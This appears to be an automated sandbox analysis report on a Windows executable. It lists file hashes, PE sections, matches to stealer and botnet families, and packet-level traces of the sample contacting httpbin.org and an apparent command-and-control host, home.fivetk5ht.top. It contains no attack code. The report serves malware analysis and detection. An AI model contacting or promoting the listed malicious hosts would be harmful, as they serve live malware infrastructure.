                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                      • 185.121.15.192
                                                      http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.137
                                                      IGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 185.189.98.142
                                                      https://agradeahead.com/Get hashmaliciousUnknownBrowse
                                                      • 185.121.15.137
                                                      http://productfocus.comGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.137
                                                      https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2eGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.137
                                                      hax.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 185.226.106.144

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      No created / dropped files found

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):7.982722793916352
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:CMpuGis28l.exe
                                                      File size:4'480'512 bytes
                                                      MD5:b6aa4b3886f2272b307df8dee7426a4f
                                                      SHA1:8c80da0f5e93622c881e82693715cc81927684fe
                                                      SHA256:b571064c090d5a6b22aecf6df5a534bf2481c0d77962369c6c4fb1500c1ad47e
                                                      SHA512:9c9f34423eb5498b5d26a9f34cb104b8f1404f76a060bc549a7a7fcd4ae7608a7f22e1c859db652331cab426453c17be093af0959bf8a7b50e72ad28ebfdbc96
                                                      SSDEEP:98304:5R5O5EL5UyXsVwLEKx8pUcNEExPX1eGBqUoWWeTKWcXcouisWn/dPCvQ:5REElBwwoCb6vlFjcWWqKZsouiRnVsQ
                                                      TLSH:A4263314CD06F9CBE66D4E71102FC9A2E1896A296B30A53F3F110BB3B7951AC3F2655C
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...0.......pH...@..........................`.......pD...@... ............................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x1093000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:DYNAMIC_BASE
                                                      Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp 00007F93352675BAh

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc912d80x10bxszsxlr
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc912880x18bxszsxlr
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      0x10000x7450000x284c00f2d3fe9da2d6f27beb72dce24e18638aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x7460000x1ac0x200d58bc69069b0f0bc03e1122aab56cc7eFalse0.580078125data4.508390843970673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      0x7480000x38c0000x200093f2894dd0f87fa65a36a1772298df1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      bxszsxlr0xad40000x1be0000x1bd600e56d3713374e54676c3c56ad10c21dceFalse0.9944245763752456data7.955545656668972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      ezgbzeah0xc920000x10000x4001c3dcabe5621d402910e7917a894438eFalse0.84375data6.317720902507682IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .taggant0xc930000x30000x220015c8f5a52edc1ae26c59efc924047666False0.072265625DOS executable (COM)0.7981673405576435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_MANIFEST0xc912e80x152ASCII text, with CRLF line terminators0.6479289940828402

                                                      Imports

                                                      DLLImport
                                                      kernel32.dlllstrcpy

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 16:20:09.715339899 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:09.715388060 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:09.715500116 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:09.728126049 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:09.728141069 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.490542889 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.502178907 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.502202034 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.503734112 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.503823996 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.522634983 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.522773981 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.573157072 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.573184967 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.609195948 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.655339003 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.929086924 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.929760933 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:11.929863930 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.943106890 CET49710443192.168.2.1298.85.100.80
                                                      Dec 20, 2024 16:20:11.943119049 CET4434971098.85.100.80192.168.2.12
                                                      Dec 20, 2024 16:20:13.054404974 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.175223112 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.175528049 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.176632881 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.296612024 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.296782017 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.296792984 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.296833992 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.296895981 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.296910048 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.296919107 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.296952963 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.296973944 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.297247887 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.297259092 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.297270060 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.297281027 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.297326088 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.297348022 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.416520119 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.416601896 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.416692972 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.417190075 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.417201996 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.417212963 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.417223930 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.417248964 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.417380095 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.458101034 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.458772898 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.577945948 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.578219891 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.626032114 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.742352009 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.742599010 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:13.946860075 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:13.947124004 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.187297106 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.187673092 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.187741995 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.309518099 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309534073 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309551001 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309561968 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309572935 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309581995 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309592009 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309602976 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309613943 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309623003 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309633970 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309643030 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309654951 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309664965 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309674025 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309678078 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309681892 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309685946 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309689045 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309700012 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309704065 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309708118 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.309719086 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309731007 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309741020 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309750080 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.309792995 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.311284065 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.429914951 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.429930925 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.429996014 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.430049896 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.430102110 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.430545092 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.430557013 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.430602074 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.430691957 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.430702925 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.430711985 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.430721998 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.431005001 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.431015015 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.431693077 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.431814909 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.431824923 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432003021 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432013035 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432022095 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432112932 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432125092 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432260036 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432270050 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432400942 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432673931 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432683945 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432858944 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432871103 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432881117 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432889938 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432898998 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432985067 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.432995081 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433003902 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433150053 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433160067 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433170080 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433497906 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433507919 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433516979 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433526993 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433708906 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433718920 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433728933 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433737993 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433748960 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433799028 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433809996 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433814049 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433823109 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433831930 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433841944 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.433851004 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.434246063 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.434256077 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.434264898 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.434276104 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.434573889 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.434633970 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.473885059 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.474864960 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.474915028 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.475276947 CET4971180192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:14.549712896 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.549773932 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.549784899 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.549896002 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.549906969 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.549916983 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.550102949 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.550209045 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.550219059 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554156065 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554331064 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554385900 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554395914 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554404974 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554487944 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554498911 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554620981 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554703951 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554713964 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554724932 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554766893 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554872990 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554915905 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.554928064 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555038929 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555056095 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555191994 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555205107 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555213928 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555290937 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555444956 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555454969 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555459976 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555629015 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555706978 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555922985 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555933952 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.555977106 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556134939 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556281090 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556292057 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556361914 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556536913 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556616068 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556632042 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556642056 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556759119 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556770086 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556906939 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.556917906 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557005882 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557017088 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557059050 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557069063 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557076931 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557379007 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557389975 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557399035 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557408094 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557419062 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557435036 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557445049 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.557455063 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.594463110 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:14.594675064 CET8049711185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:15.205106974 CET4971280192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:15.325505972 CET8049712185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:15.325623989 CET4971280192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:15.325867891 CET4971280192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:15.445679903 CET8049712185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:16.608032942 CET8049712185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:16.608167887 CET8049712185.121.15.192192.168.2.12
                                                      Dec 20, 2024 16:20:16.608238935 CET4971280192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:16.608419895 CET4971280192.168.2.12185.121.15.192
                                                      Dec 20, 2024 16:20:16.727943897 CET8049712185.121.15.192192.168.2.12

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 16:20:09.419254065 CET6117253192.168.2.121.1.1.1
                                                      Dec 20, 2024 16:20:09.419388056 CET6117253192.168.2.121.1.1.1
                                                      Dec 20, 2024 16:20:09.556961060 CET53611721.1.1.1192.168.2.12
                                                      Dec 20, 2024 16:20:09.712722063 CET53611721.1.1.1192.168.2.12
                                                      Dec 20, 2024 16:20:12.908492088 CET6117553192.168.2.121.1.1.1
                                                      Dec 20, 2024 16:20:12.908627033 CET6117553192.168.2.121.1.1.1
                                                      Dec 20, 2024 16:20:13.046479940 CET53611751.1.1.1192.168.2.12
                                                      Dec 20, 2024 16:20:13.047024965 CET53611751.1.1.1192.168.2.12
                                                      Dec 20, 2024 16:20:15.066340923 CET6117753192.168.2.121.1.1.1
                                                      Dec 20, 2024 16:20:15.066437960 CET6117753192.168.2.121.1.1.1
                                                      Dec 20, 2024 16:20:15.204268932 CET53611771.1.1.1192.168.2.12
                                                      Dec 20, 2024 16:20:15.204538107 CET53611771.1.1.1192.168.2.12

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 20, 2024 16:20:09.419254065 CET192.168.2.121.1.1.10x49c5Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 16:20:09.419388056 CET192.168.2.121.1.1.10xf230Standard query (0)httpbin.org28IN (0x0001)false
                                                      Dec 20, 2024 16:20:12.908492088 CET192.168.2.121.1.1.10x3d83Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 16:20:12.908627033 CET192.168.2.121.1.1.10xf617Standard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                      Dec 20, 2024 16:20:15.066340923 CET192.168.2.121.1.1.10x5145Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                      Dec 20, 2024 16:20:15.066437960 CET192.168.2.121.1.1.10x29b2Standard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 20, 2024 16:20:09.556961060 CET1.1.1.1192.168.2.120x49c5No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 16:20:09.556961060 CET1.1.1.1192.168.2.120x49c5No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 16:20:13.046479940 CET1.1.1.1192.168.2.120x3d83No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                      Dec 20, 2024 16:20:15.204268932 CET1.1.1.1192.168.2.120x5145No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • httpbin.org
                                                      • home.fivetk5ht.top

                                                      HTTP Packets

